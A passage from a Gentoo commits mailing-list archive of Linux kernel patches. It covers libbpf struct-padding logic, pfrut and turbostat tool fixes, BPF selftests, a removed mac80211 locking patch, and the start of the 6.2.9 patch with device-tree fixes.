+ 	vlen = btf_vlen(t);
+ 	/* all non-bitfield fields have to be naturally aligned */
+@@ -849,8 +844,11 @@ static bool btf_is_struct_packed(const struct btf *btf, __u32 id,
+ 		bit_sz = btf_member_bitfield_size(t, i);
+ 		if (align && bit_sz == 0 && m->offset % (8 * align) != 0)
+ 			return true;
++		max_align = max(align, max_align);
+ 	}
+-
++	/* size of a non-packed struct has to be a multiple of its alignment */
++	if (t->size % max_align != 0)
++		return true;
+ 	/*
+ 	 * if original struct was marked as packed, but its layout is
+ 	 * naturally aligned, we'll detect that it's not packed
+@@ -858,44 +856,97 @@ static bool btf_is_struct_packed(const struct btf *btf, __u32 id,
+ 	return false;
+ }
+ 
+-static int chip_away_bits(int total, int at_most)
+-{
+-	return total % at_most ? : at_most;
+-}
+-
+ static void btf_dump_emit_bit_padding(const struct btf_dump *d,
+-				      int cur_off, int m_off, int m_bit_sz,
+-				      int align, int lvl)
++				      int cur_off, int next_off, int next_align,
++				      bool in_bitfield, int lvl)
+ {
+-	int off_diff = m_off - cur_off;
+-	int ptr_bits = d->ptr_sz * 8;
++	const struct {
++		const char *name;
++		int bits;
++	} pads[] = {
++		{"long", d->ptr_sz * 8}, {"int", 32}, {"short", 16}, {"char", 8}
++	};
++	int new_off, pad_bits, bits, i;
++	const char *pad_type;
++
++	if (cur_off >= next_off)
++		return; /* no gap */
++
++	/* For filling out padding we want to take advantage of
++	 * natural alignment rules to minimize unnecessary explicit
++	 * padding. First, we find the largest type (among long, int,
++	 * short, or char) that can be used to force naturally aligned
++	 * boundary. Once determined, we'll use such type to fill in
++	 * the remaining padding gap. In some cases we can rely on
++	 * compiler filling some gaps, but sometimes we need to force
++	 * alignment to close natural alignment with markers like
++	 * `long: 0` (this is always the case for bitfields).  Note
++	 * that even if struct itself has, let's say 4-byte alignment
++	 * (i.e., it only uses up to int-aligned types), using `long:
++	 * X;` explicit padding doesn't actually change struct's
++	 * overall alignment requirements, but compiler does take into
++	 * account that type's (long, in this example) natural
++	 * alignment requirements when adding implicit padding. We use
++	 * this fact heavily and don't worry about ruining correct
++	 * struct alignment requirement.
++	 */
++	for (i = 0; i < ARRAY_SIZE(pads); i++) {
++		pad_bits = pads[i].bits;
++		pad_type = pads[i].name;
+ 
+-	if (off_diff <= 0)
+-		/* no gap */
+-		return;
+-	if (m_bit_sz == 0 && off_diff < align * 8)
+-		/* natural padding will take care of a gap */
+-		return;
++		new_off = roundup(cur_off, pad_bits);
++		if (new_off <= next_off)
++			break;
++	}
+ 
+-	while (off_diff > 0) {
+-		const char *pad_type;
+-		int pad_bits;
+-
+-		if (ptr_bits > 32 && off_diff > 32) {
+-			pad_type = "long";
+-			pad_bits = chip_away_bits(off_diff, ptr_bits);
+-		} else if (off_diff > 16) {
+-			pad_type = "int";
+-			pad_bits = chip_away_bits(off_diff, 32);
+-		} else if (off_diff > 8) {
+-			pad_type = "short";
+-			pad_bits = chip_away_bits(off_diff, 16);
+-		} else {
+-			pad_type = "char";
+-			pad_bits = chip_away_bits(off_diff, 8);
++	if (new_off > cur_off && new_off <= next_off) {
++		/* We need explicit `<type>: 0` aligning mark if next
++		 * field is right on alignment offset and its
++		 * alignment requirement is less strict than <type>'s
++		 * alignment (so compiler won't naturally align to the
++		 * offset we expect), or if subsequent `<type>: X`,
++		 * will actually completely fit in the remaining hole,
++		 * making compiler basically ignore `<type>: X`
++		 * completely.
++		 */
++		if (in_bitfield ||
++		    (new_off == next_off && roundup(cur_off, next_align * 8) != new_off) ||
++		    (new_off != next_off && next_off - new_off <= new_off - cur_off))
++			/* but for bitfields we'll emit explicit bit count */
++			btf_dump_printf(d, "\n%s%s: %d;", pfx(lvl), pad_type,
++					in_bitfield ? new_off - cur_off : 0);
++		cur_off = new_off;
++	}
++
++	/* Now we know we start at naturally aligned offset for a chosen
++	 * padding type (long, int, short, or char), and so the rest is just
++	 * a straightforward filling of remaining padding gap with full
++	 * `<type>: sizeof(<type>);` markers, except for the last one, which
++	 * might need smaller than sizeof(<type>) padding.
++	 */
++	while (cur_off != next_off) {
++		bits = min(next_off - cur_off, pad_bits);
++		if (bits == pad_bits) {
++			btf_dump_printf(d, "\n%s%s: %d;", pfx(lvl), pad_type, pad_bits);
++			cur_off += bits;
++			continue;
++		}
++		/* For the remainder padding that doesn't cover entire
++		 * pad_type bit length, we pick the smallest necessary type.
++		 * This is pure aesthetics, we could have just used `long`,
++		 * but having smallest necessary one communicates better the
++		 * scale of the padding gap.
++		 */
++		for (i = ARRAY_SIZE(pads) - 1; i >= 0; i--) {
++			pad_type = pads[i].name;
++			pad_bits = pads[i].bits;
++			if (pad_bits < bits)
++				continue;
++
++			btf_dump_printf(d, "\n%s%s: %d;", pfx(lvl), pad_type, bits);
++			cur_off += bits;
++			break;
+ 		}
+-		btf_dump_printf(d, "\n%s%s: %d;", pfx(lvl), pad_type, pad_bits);
+-		off_diff -= pad_bits;
+ 	}
+ }
+ 
+@@ -915,9 +966,11 @@ static void btf_dump_emit_struct_def(struct btf_dump *d,
+ {
+ 	const struct btf_member *m = btf_members(t);
+ 	bool is_struct = btf_is_struct(t);
+-	int align, i, packed, off = 0;
++	bool packed, prev_bitfield = false;
++	int align, i, off = 0;
+ 	__u16 vlen = btf_vlen(t);
+ 
++	align = btf__align_of(d->btf, id);
+ 	packed = is_struct ? btf_is_struct_packed(d->btf, id, t) : 0;
+ 
+ 	btf_dump_printf(d, "%s%s%s {",
+@@ -927,33 +980,36 @@ static void btf_dump_emit_struct_def(struct btf_dump *d,
+ 
+ 	for (i = 0; i < vlen; i++, m++) {
+ 		const char *fname;
+-		int m_off, m_sz;
++		int m_off, m_sz, m_align;
++		bool in_bitfield;
+ 
+ 		fname = btf_name_of(d, m->name_off);
+ 		m_sz = btf_member_bitfield_size(t, i);
+ 		m_off = btf_member_bit_offset(t, i);
+-		align = packed ? 1 : btf__align_of(d->btf, m->type);
++		m_align = packed ? 1 : btf__align_of(d->btf, m->type);
+ 
+-		btf_dump_emit_bit_padding(d, off, m_off, m_sz, align, lvl + 1);
++		in_bitfield = prev_bitfield && m_sz != 0;
++
++		btf_dump_emit_bit_padding(d, off, m_off, m_align, in_bitfield, lvl + 1);
+ 		btf_dump_printf(d, "\n%s", pfx(lvl + 1));
+ 		btf_dump_emit_type_decl(d, m->type, fname, lvl + 1);
+ 
+ 		if (m_sz) {
+ 			btf_dump_printf(d, ": %d", m_sz);
+ 			off = m_off + m_sz;
++			prev_bitfield = true;
+ 		} else {
+ 			m_sz = max((__s64)0, btf__resolve_size(d->btf, m->type));
+ 			off = m_off + m_sz * 8;
++			prev_bitfield = false;
+ 		}
++
+ 		btf_dump_printf(d, ";");
+ 	}
+ 
+ 	/* pad at the end, if necessary */
+-	if (is_struct) {
+-		align = packed ? 1 : btf__align_of(d->btf, id);
+-		btf_dump_emit_bit_padding(d, off, t->size * 8, 0, align,
+-					  lvl + 1);
+-	}
++	if (is_struct)
++		btf_dump_emit_bit_padding(d, off, t->size * 8, align, false, lvl + 1);
+ 
+ 	/*
+ 	 * Keep `struct empty {}` on a single line,
+diff --git a/tools/power/acpi/tools/pfrut/pfrut.c b/tools/power/acpi/tools/pfrut/pfrut.c
+index 52aa0351533c3..388c9e3ad0407 100644
+--- a/tools/power/acpi/tools/pfrut/pfrut.c
++++ b/tools/power/acpi/tools/pfrut/pfrut.c
+@@ -97,7 +97,7 @@ static struct option long_options[] = {
+ static void parse_options(int argc, char **argv)
+ {
+ 	int option_index = 0;
+-	char *pathname;
++	char *pathname, *endptr;
+ 	int opt;
+ 
+ 	pathname = strdup(argv[0]);
+@@ -125,11 +125,23 @@ static void parse_options(int argc, char **argv)
+ 			log_getinfo = 1;
+ 			break;
+ 		case 'T':
+-			log_type = atoi(optarg);
++			log_type = strtol(optarg, &endptr, 0);
++			if (*endptr || (log_type != 0 && log_type != 1)) {
++				printf("Number expected: type(0:execution, 1:history) - Quit.\n");
++				exit(1);
++			}
++
+ 			set_log_type = 1;
+ 			break;
+ 		case 'L':
+-			log_level = atoi(optarg);
++			log_level = strtol(optarg, &endptr, 0);
++			if (*endptr ||
++			    (log_level != 0 && log_level != 1 &&
++			     log_level != 2 && log_level != 4)) {
++				printf("Number expected: level(0, 1, 2, 4) - Quit.\n");
++				exit(1);
++			}
++
+ 			set_log_level = 1;
+ 			break;
+ 		case 'R':
+diff --git a/tools/power/x86/turbostat/turbostat.8 b/tools/power/x86/turbostat/turbostat.8
+index c7b26a3603afe..3e1a4c4be001a 100644
+--- a/tools/power/x86/turbostat/turbostat.8
++++ b/tools/power/x86/turbostat/turbostat.8
+@@ -344,6 +344,8 @@ Alternatively, non-root users can be enabled to run turbostat this way:
+ 
+ # chmod +r /dev/cpu/*/msr
+ 
++# chmod +r /dev/cpu_dma_latency
++
+ .B "turbostat "
+ reads hardware counters, but doesn't write them.
+ So it will not interfere with the OS or other programs, including
+diff --git a/tools/power/x86/turbostat/turbostat.c b/tools/power/x86/turbostat/turbostat.c
+index aba460410dbd1..c61c6c704fbe6 100644
+--- a/tools/power/x86/turbostat/turbostat.c
++++ b/tools/power/x86/turbostat/turbostat.c
+@@ -4426,7 +4426,7 @@ int print_hwp(struct thread_data *t, struct core_data *c, struct pkg_data *p)
+ 
+ 	fprintf(outf, "cpu%d: MSR_HWP_STATUS: 0x%08llx "
+ 		"(%sGuaranteed_Perf_Change, %sExcursion_Min)\n",
+-		cpu, msr, ((msr) & 0x1) ? "" : "No-", ((msr) & 0x2) ? "" : "No-");
++		cpu, msr, ((msr) & 0x1) ? "" : "No-", ((msr) & 0x4) ? "" : "No-");
+ 
+ 	return 0;
+ }
+@@ -5482,7 +5482,7 @@ void print_dev_latency(void)
+ 
+ 	retval = read(fd, (void *)&value, sizeof(int));
+ 	if (retval != sizeof(int)) {
+-		warn("read %s\n", path);
++		warn("read failed %s\n", path);
+ 		close(fd);
+ 		return;
+ 	}
+diff --git a/tools/testing/selftests/bpf/progs/btf_dump_test_case_bitfields.c b/tools/testing/selftests/bpf/progs/btf_dump_test_case_bitfields.c
+index e5560a6560309..e01690618e1ee 100644
+--- a/tools/testing/selftests/bpf/progs/btf_dump_test_case_bitfields.c
++++ b/tools/testing/selftests/bpf/progs/btf_dump_test_case_bitfields.c
+@@ -53,7 +53,7 @@ struct bitfields_only_mixed_types {
+  */
+ /* ------ END-EXPECTED-OUTPUT ------ */
+ struct bitfield_mixed_with_others {
+-	long: 4; /* char is enough as a backing field */
++	char: 4; /* char is enough as a backing field */
+ 	int a: 4;
+ 	/* 8-bit implicit padding */
+ 	short b; /* combined with previous bitfield */
+diff --git a/tools/testing/selftests/bpf/progs/btf_dump_test_case_packing.c b/tools/testing/selftests/bpf/progs/btf_dump_test_case_packing.c
+index e304b6204bd9d..7998f27df7ddd 100644
+--- a/tools/testing/selftests/bpf/progs/btf_dump_test_case_packing.c
++++ b/tools/testing/selftests/bpf/progs/btf_dump_test_case_packing.c
+@@ -58,7 +58,81 @@ union jump_code_union {
+ 	} __attribute__((packed));
+ };
+ 
+-/*------ END-EXPECTED-OUTPUT ------ */
++/* ----- START-EXPECTED-OUTPUT ----- */
++/*
++ *struct nested_packed_but_aligned_struct {
++ *	int x1;
++ *	int x2;
++ *};
++ *
++ *struct outer_implicitly_packed_struct {
++ *	char y1;
++ *	struct nested_packed_but_aligned_struct y2;
++ *} __attribute__((packed));
++ *
++ */
++/* ------ END-EXPECTED-OUTPUT ------ */
++
++struct nested_packed_but_aligned_struct {
++	int x1;
++	int x2;
++} __attribute__((packed));
++
++struct outer_implicitly_packed_struct {
++	char y1;
++	struct nested_packed_but_aligned_struct y2;
++};
++/* ----- START-EXPECTED-OUTPUT ----- */
++/*
++ *struct usb_ss_ep_comp_descriptor {
++ *	char: 8;
++ *	char bDescriptorType;
++ *	char bMaxBurst;
++ *	short wBytesPerInterval;
++ *};
++ *
++ *struct usb_host_endpoint {
++ *	long: 64;
++ *	char: 8;
++ *	struct usb_ss_ep_comp_descriptor ss_ep_comp;
++ *	long: 0;
++ *} __attribute__((packed));
++ *
++ */
++/* ------ END-EXPECTED-OUTPUT ------ */
++
++struct usb_ss_ep_comp_descriptor {
++	char: 8;
++	char bDescriptorType;
++	char bMaxBurst;
++	int: 0;
++	short wBytesPerInterval;
++} __attribute__((packed));
++
++struct usb_host_endpoint {
++	long: 64;
++	char: 8;
++	struct usb_ss_ep_comp_descriptor ss_ep_comp;
++	long: 0;
++};
++
++/* ----- START-EXPECTED-OUTPUT ----- */
++struct nested_packed_struct {
++	int a;
++	char b;
++} __attribute__((packed));
++
++struct outer_nonpacked_struct {
++	short a;
++	struct nested_packed_struct b;
++};
++
++struct outer_packed_struct {
++	short a;
++	struct nested_packed_struct b;
++} __attribute__((packed));
++
++/* ------ END-EXPECTED-OUTPUT ------ */
+ 
+ int f(struct {
+ 	struct packed_trailing_space _1;
+@@ -69,6 +143,10 @@ int f(struct {
+ 	union union_is_never_packed _6;
+ 	union union_does_not_need_packing _7;
+ 	union jump_code_union _8;
++	struct outer_implicitly_packed_struct _9;
++	struct usb_host_endpoint _10;
++	struct outer_nonpacked_struct _11;
++	struct outer_packed_struct _12;
+ } *_)
+ {
+ 	return 0;
+diff --git a/tools/testing/selftests/bpf/progs/btf_dump_test_case_padding.c b/tools/testing/selftests/bpf/progs/btf_dump_test_case_padding.c
+index 7cb522d22a664..79276fbe454a8 100644
+--- a/tools/testing/selftests/bpf/progs/btf_dump_test_case_padding.c
++++ b/tools/testing/selftests/bpf/progs/btf_dump_test_case_padding.c
+@@ -19,7 +19,7 @@ struct padded_implicitly {
+ /*
+  *struct padded_explicitly {
+  *	int a;
+- *	int: 32;
++ *	long: 0;
+  *	int b;
+  *};
+  *
+@@ -28,41 +28,28 @@ struct padded_implicitly {
+ 
+ struct padded_explicitly {
+ 	int a;
+-	int: 1; /* algo will explicitly pad with full 32 bits here */
++	int: 1; /* algo will emit aligning `long: 0;` here */
+ 	int b;
+ };
+ 
+ /* ----- START-EXPECTED-OUTPUT ----- */
+-/*
+- *struct padded_a_lot {
+- *	int a;
+- *	long: 32;
+- *	long: 64;
+- *	long: 64;
+- *	int b;
+- *};
+- *
+- */
+-/* ------ END-EXPECTED-OUTPUT ------ */
+-
+ struct padded_a_lot {
+ 	int a;
+-	/* 32 bit of implicit padding here, which algo will make explicit */
+ 	long: 64;
+ 	long: 64;
+ 	int b;
+ };
+ 
++/* ------ END-EXPECTED-OUTPUT ------ */
++
+ /* ----- START-EXPECTED-OUTPUT ----- */
+ /*
+  *struct padded_cache_line {
+  *	int a;
+- *	long: 32;
+  *	long: 64;
+  *	long: 64;
+  *	long: 64;
+  *	int b;
+- *	long: 32;
+  *	long: 64;
+  *	long: 64;
+  *	long: 64;
+@@ -85,7 +72,7 @@ struct padded_cache_line {
+  *struct zone {
+  *	int a;
+  *	short b;
+- *	short: 16;
++ *	long: 0;
+  *	struct zone_padding __pad__;
+  *};
+  *
+@@ -108,6 +95,131 @@ struct padding_wo_named_members {
+ 	long: 64;
+ };
+ 
++struct padding_weird_1 {
++	int a;
++	long: 64;
++	short: 16;
++	short b;
++};
++
++/* ------ END-EXPECTED-OUTPUT ------ */
++
++/* ----- START-EXPECTED-OUTPUT ----- */
++/*
++ *struct padding_weird_2 {
++ *	long: 56;
++ *	char a;
++ *	long: 56;
++ *	char b;
++ *	char: 8;
++ *};
++ *
++ */
++/* ------ END-EXPECTED-OUTPUT ------ */
++struct padding_weird_2 {
++	int: 32;	/* these paddings will be collapsed into `long: 56;` */
++	short: 16;
++	char: 8;
++	char a;
++	int: 32;	/* these paddings will be collapsed into `long: 56;` */
++	short: 16;
++	char: 8;
++	char b;
++	char: 8;
++};
++
++/* ----- START-EXPECTED-OUTPUT ----- */
++struct exact_1byte {
++	char x;
++};
++
++struct padded_1byte {
++	char: 8;
++};
++
++struct exact_2bytes {
++	short x;
++};
++
++struct padded_2bytes {
++	short: 16;
++};
++
++struct exact_4bytes {
++	int x;
++};
++
++struct padded_4bytes {
++	int: 32;
++};
++
++struct exact_8bytes {
++	long x;
++};
++
++struct padded_8bytes {
++	long: 64;
++};
++
++struct ff_periodic_effect {
++	int: 32;
++	short magnitude;
++	long: 0;
++	short phase;
++	long: 0;
++	int: 32;
++	int custom_len;
++	short *custom_data;
++};
++
++struct ib_wc {
++	long: 64;
++	long: 64;
++	int: 32;
++	int byte_len;
++	void *qp;
++	union {} ex;
++	long: 64;
++	int slid;
++	int wc_flags;
++	long: 64;
++	char smac[6];
++	long: 0;
++	char network_hdr_type;
++};
++
++struct acpi_object_method {
++	long: 64;
++	char: 8;
++	char type;
++	short reference_count;
++	char flags;
++	short: 0;
++	char: 8;
++	char sync_level;
++	long: 64;
++	void *node;
++	void *aml_start;
++	union {} dispatch;
++	long: 64;
++	int aml_length;
++};
++
++struct nested_unpacked {
++	int x;
++};
++
++struct nested_packed {
++	struct nested_unpacked a;
++	char c;
++} __attribute__((packed));
++
++struct outer_mixed_but_unpacked {
++	struct nested_packed b1;
++	short a1;
++	struct nested_packed b2;
++};
++
+ /* ------ END-EXPECTED-OUTPUT ------ */
+ 
+ int f(struct {
+@@ -117,6 +229,20 @@ int f(struct {
+ 	struct padded_cache_line _4;
+ 	struct zone _5;
+ 	struct padding_wo_named_members _6;
++	struct padding_weird_1 _7;
++	struct padding_weird_2 _8;
++	struct exact_1byte _100;
++	struct padded_1byte _101;
++	struct exact_2bytes _102;
++	struct padded_2bytes _103;
++	struct exact_4bytes _104;
++	struct padded_4bytes _105;
++	struct exact_8bytes _106;
++	struct padded_8bytes _107;
++	struct ff_periodic_effect _200;
++	struct ib_wc _201;
++	struct acpi_object_method _202;
++	struct outer_mixed_but_unpacked _203;
+ } *_)
+ {
+ 	return 0;


^ permalink raw reply related	[flat|nested] 30+ messages in thread
* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-03-30 21:52 Mike Pagano
  0 siblings, 0 replies; 30+ messages in thread
From: Mike Pagano @ 2023-03-30 21:52 UTC (permalink / raw
  To: gentoo-commits

commit:     8bc34b9a0a752753031d74810d9bd32afee5a827
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Mar 30 21:52:01 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Mar 30 21:52:01 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=8bc34b9a

Remove redundant patch

Removed:
2400_WiFi-mac80211-serialize-ieee80211-handle-wake-tx-queue.patch

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                        |  4 --
 ...-serialize-ieee80211-handle-wake-tx-queue.patch | 84 ----------------------
 2 files changed, 88 deletions(-)

diff --git a/0000_README b/0000_README
index 737b0e84..47edd2da 100644
--- a/0000_README
+++ b/0000_README
@@ -95,10 +95,6 @@ Patch:  2000_BT-Check-key-sizes-only-if-Secure-Simple-Pairing-enabled.patch
 From:   https://lore.kernel.org/linux-bluetooth/20190522070540.48895-1-marcel@holtmann.org/raw
 Desc:   Bluetooth: Check key sizes only when Secure Simple Pairing is enabled. See bug #686758
 
-Patch:  2400_WiFi-mac80211-serialize-ieee80211-handle-wake-tx-queue.patch
-From:   https://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git
-Desc:   wifi: mac80211: Serialize ieee80211_handle_wake_tx_queue()
-
 Patch:  2900_tmp513-Fix-build-issue-by-selecting-CONFIG_REG.patch
 From:   https://bugs.gentoo.org/710790
 Desc:   tmp513 requies REGMAP_I2C to build.  Select it by default in Kconfig. See bug #710790. Thanks to Phil Stracchino

diff --git a/2400_WiFi-mac80211-serialize-ieee80211-handle-wake-tx-queue.patch b/2400_WiFi-mac80211-serialize-ieee80211-handle-wake-tx-queue.patch
deleted file mode 100644
index ed730a0a..00000000
--- a/2400_WiFi-mac80211-serialize-ieee80211-handle-wake-tx-queue.patch
+++ /dev/null
@@ -1,84 +0,0 @@
-From 007ae9b268ba7553e479608cf9735d3c4672a2ab Mon Sep 17 00:00:00 2001
-From: Alexander Wetzel <alexander@wetzel-home.de>
-Date: Tue, 14 Mar 2023 22:11:22 +0100
-Subject: wifi: mac80211: Serialize ieee80211_handle_wake_tx_queue()
-
-ieee80211_handle_wake_tx_queue must not run concurrent multiple times.
-It calls ieee80211_txq_schedule_start() and the drivers migrated to iTXQ
-do not expect overlapping drv_tx() calls.
-
-This fixes 'c850e31f79f0 ("wifi: mac80211: add internal handler for
-wake_tx_queue")', which introduced ieee80211_handle_wake_tx_queue.
-Drivers started to use it with 'a790cc3a4fad ("wifi: mac80211: add
-wake_tx_queue callback to drivers")'.
-But only after fixing an independent bug with
-'4444bc2116ae ("wifi: mac80211: Proper mark iTXQs for resumption")'
-problematic concurrent calls really happened and exposed the initial
-issue.
-
-Fixes: c850e31f79f0 ("wifi: mac80211: add internal handler for wake_tx_queue")
-Reported-by: Thomas Mann <rauchwolke@gmx.net>
-Link: https://bugzilla.kernel.org/show_bug.cgi?id=217119
-Link: https://lore.kernel.org/r/b8efebc6-4399-d0b8-b2a0-66843314616b@leemhuis.info/
-Link: https://lore.kernel.org/r/b7445607128a6b9ed7c17fcdcf3679bfaf4aaea.camel@sipsolutions.net>
-CC: <stable@vger.kernel.org>
-Signed-off-by: Alexander Wetzel <alexander@wetzel-home.de>
-Link: https://lore.kernel.org/r/20230314211122.111688-1-alexander@wetzel-home.de
-[add missing spin_lock_init() noticed by Felix]
-Signed-off-by: Johannes Berg <johannes.berg@intel.com>
----
- net/mac80211/ieee80211_i.h | 3 +++
- net/mac80211/main.c        | 2 ++
- net/mac80211/util.c        | 3 +++
- 3 files changed, 8 insertions(+)
-
-diff --git a/net/mac80211/ieee80211_i.h b/net/mac80211/ieee80211_i.h
-index ecc232eb1ee82..e082582e0aa28 100644
---- a/net/mac80211/ieee80211_i.h
-+++ b/net/mac80211/ieee80211_i.h
-@@ -1284,6 +1284,9 @@ struct ieee80211_local {
- 	struct list_head active_txqs[IEEE80211_NUM_ACS];
- 	u16 schedule_round[IEEE80211_NUM_ACS];
- 
-+	/* serializes ieee80211_handle_wake_tx_queue */
-+	spinlock_t handle_wake_tx_queue_lock;
-+
- 	u16 airtime_flags;
- 	u32 aql_txq_limit_low[IEEE80211_NUM_ACS];
- 	u32 aql_txq_limit_high[IEEE80211_NUM_ACS];
-diff --git a/net/mac80211/main.c b/net/mac80211/main.c
-index 846528850612a..ddf2b7811c557 100644
---- a/net/mac80211/main.c
-+++ b/net/mac80211/main.c
-@@ -802,6 +802,8 @@ struct ieee80211_hw *ieee80211_alloc_hw_nm(size_t priv_data_len,
- 	local->aql_threshold = IEEE80211_AQL_THRESHOLD;
- 	atomic_set(&local->aql_total_pending_airtime, 0);
- 
-+	spin_lock_init(&local->handle_wake_tx_queue_lock);
-+
- 	INIT_LIST_HEAD(&local->chanctx_list);
- 	mutex_init(&local->chanctx_mtx);
- 
-diff --git a/net/mac80211/util.c b/net/mac80211/util.c
-index 1a28fe5cb614f..3aceb3b731bf4 100644
---- a/net/mac80211/util.c
-+++ b/net/mac80211/util.c
-@@ -314,6 +314,8 @@ void ieee80211_handle_wake_tx_queue(struct ieee80211_hw *hw,
- 	struct ieee80211_sub_if_data *sdata = vif_to_sdata(txq->vif);
- 	struct ieee80211_txq *queue;
- 
-+	spin_lock(&local->handle_wake_tx_queue_lock);
-+
- 	/* Use ieee80211_next_txq() for airtime fairness accounting */
- 	ieee80211_txq_schedule_start(hw, txq->ac);
- 	while ((queue = ieee80211_next_txq(hw, txq->ac))) {
-@@ -321,6 +323,7 @@ void ieee80211_handle_wake_tx_queue(struct ieee80211_hw *hw,
- 		ieee80211_return_txq(hw, queue, false);
- 	}
- 	ieee80211_txq_schedule_end(hw, txq->ac);
-+	spin_unlock(&local->handle_wake_tx_queue_lock);
- }
- EXPORT_SYMBOL(ieee80211_handle_wake_tx_queue);
- 
--- 
-cgit 


^ permalink raw reply related	[flat|nested] 30+ messages in thread
* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-03-30 11:20 Alice Ferrazzi
  0 siblings, 0 replies; 30+ messages in thread
From: Alice Ferrazzi @ 2023-03-30 11:20 UTC (permalink / raw
  To: gentoo-commits

commit:     10a5a9c990c89c266dfc68235dc61d9c5f8bb667
Author:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
AuthorDate: Thu Mar 30 11:20:25 2023 +0000
Commit:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
CommitDate: Thu Mar 30 11:20:25 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=10a5a9c9

Linux patch 6.2.9

Signed-off-by: Alice Ferrazzi <alicef <AT> gentoo.org>

 0000_README            |    4 +
 1008_linux-6.2.9.patch | 8993 ++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 8997 insertions(+)

diff --git a/0000_README b/0000_README
index a2d57d44..737b0e84 100644
--- a/0000_README
+++ b/0000_README
@@ -75,6 +75,10 @@ Patch:  1007_linux-6.2.8.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.2.8
 
+Patch:  1008_linux-6.2.9.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.2.9
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1008_linux-6.2.9.patch b/1008_linux-6.2.9.patch
new file mode 100644
index 00000000..275257fa
--- /dev/null
+++ b/1008_linux-6.2.9.patch
@@ -0,0 +1,8993 @@
+diff --git a/Makefile b/Makefile
+index 2c90d9b067f4a..8732f7208d59b 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 2
+-SUBLEVEL = 8
++SUBLEVEL = 9
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/arm/boot/dts/e60k02.dtsi b/arch/arm/boot/dts/e60k02.dtsi
+index 94944cc219317..dd03e3860f97f 100644
+--- a/arch/arm/boot/dts/e60k02.dtsi
++++ b/arch/arm/boot/dts/e60k02.dtsi
+@@ -311,6 +311,7 @@
+ 
+ &usbotg1 {
+ 	pinctrl-names = "default";
++	pinctrl-0 = <&pinctrl_usbotg1>;
+ 	disable-over-current;
+ 	srp-disable;
+ 	hnp-disable;
+diff --git a/arch/arm/boot/dts/e70k02.dtsi b/arch/arm/boot/dts/e70k02.dtsi
+index 27ef9a62b23cf..a1f9fbd6004aa 100644
+--- a/arch/arm/boot/dts/e70k02.dtsi
++++ b/arch/arm/boot/dts/e70k02.dtsi
+@@ -312,6 +312,7 @@
+ 
+ &usbotg1 {
+ 	pinctrl-names = "default";
++	pinctrl-0 = <&pinctrl_usbotg1>;
+ 	disable-over-current;
+ 	srp-disable;
+ 	hnp-disable;
+diff --git a/arch/arm/boot/dts/imx6sl-tolino-shine2hd.dts b/arch/arm/boot/dts/imx6sl-tolino-shine2hd.dts
+index da1399057634a..815119c12bd48 100644
+--- a/arch/arm/boot/dts/imx6sl-tolino-shine2hd.dts
++++ b/arch/arm/boot/dts/imx6sl-tolino-shine2hd.dts
+@@ -625,6 +625,7 @@
+ 
+ &usbotg1 {
+ 	pinctrl-names = "default";
++	pinctrl-0 = <&pinctrl_usbotg1>;
+ 	disable-over-current;
+ 	srp-disable;
+ 	hnp-disable;
+diff --git a/arch/arm64/boot/dts/freescale/imx8-ss-lsio.dtsi b/arch/arm64/boot/dts/freescale/imx8-ss-lsio.dtsi
+index 1f3d225e64ece..06b94bbc2b97d 100644
+--- a/arch/arm64/boot/dts/freescale/imx8-ss-lsio.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8-ss-lsio.dtsi
+@@ -117,7 +117,7 @@ lsio_subsys: bus@5d000000 {
+ 		interrupts = <GIC_SPI 92 IRQ_TYPE_LEVEL_HIGH>;
+ 		clocks = <&clk IMX_SC_R_FSPI_0 IMX_SC_PM_CLK_PER>,
+ 			 <&clk IMX_SC_R_FSPI_0 IMX_SC_PM_CLK_PER>;
+-		clock-names = "fspi", "fspi_en";
++		clock-names = "fspi_en", "fspi";
+ 		power-domains = <&pd IMX_SC_R_FSPI_0>;
+ 		status = "disabled";
+ 	};
+diff --git a/arch/arm64/boot/dts/freescale/imx8dxl-evk.dts b/arch/arm64/boot/dts/freescale/imx8dxl-evk.dts
+index 280a9c9d8bd98..852420349c013 100644
+--- a/arch/arm64/boot/dts/freescale/imx8dxl-evk.dts
++++ b/arch/arm64/boot/dts/freescale/imx8dxl-evk.dts
+@@ -121,8 +121,6 @@
+ 	phy-handle = <&ethphy0>;
+ 	nvmem-cells = <&fec_mac1>;
+ 	nvmem-cell-names = "mac-address";
+-	snps,reset-gpios = <&pca6416_1 2 GPIO_ACTIVE_LOW>;
+-	snps,reset-delays-us = <10 20 200000>;
+ 	status = "okay";
+ 
+ 	mdio {
+@@ -135,6 +133,10 @@
+ 			reg = <0>;
+ 			eee-broken-1000t;
+ 			qca,disable-smarteee;
++			qca,disable-hibernation-mode;
++			reset-gpios = <&pca6416_1 2 GPIO_ACTIVE_LOW>;
++			reset-assert-us = <20>;
++			reset-deassert-us = <200000>;
+ 			vddio-supply = <&vddio0>;
+ 
+ 			vddio0: vddio-regulator {
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-nitrogen-r2.dts b/arch/arm64/boot/dts/freescale/imx8mm-nitrogen-r2.dts
+index 6357078185edd..0e8f0d7161ad0 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-nitrogen-r2.dts
++++ b/arch/arm64/boot/dts/freescale/imx8mm-nitrogen-r2.dts
+@@ -247,7 +247,7 @@
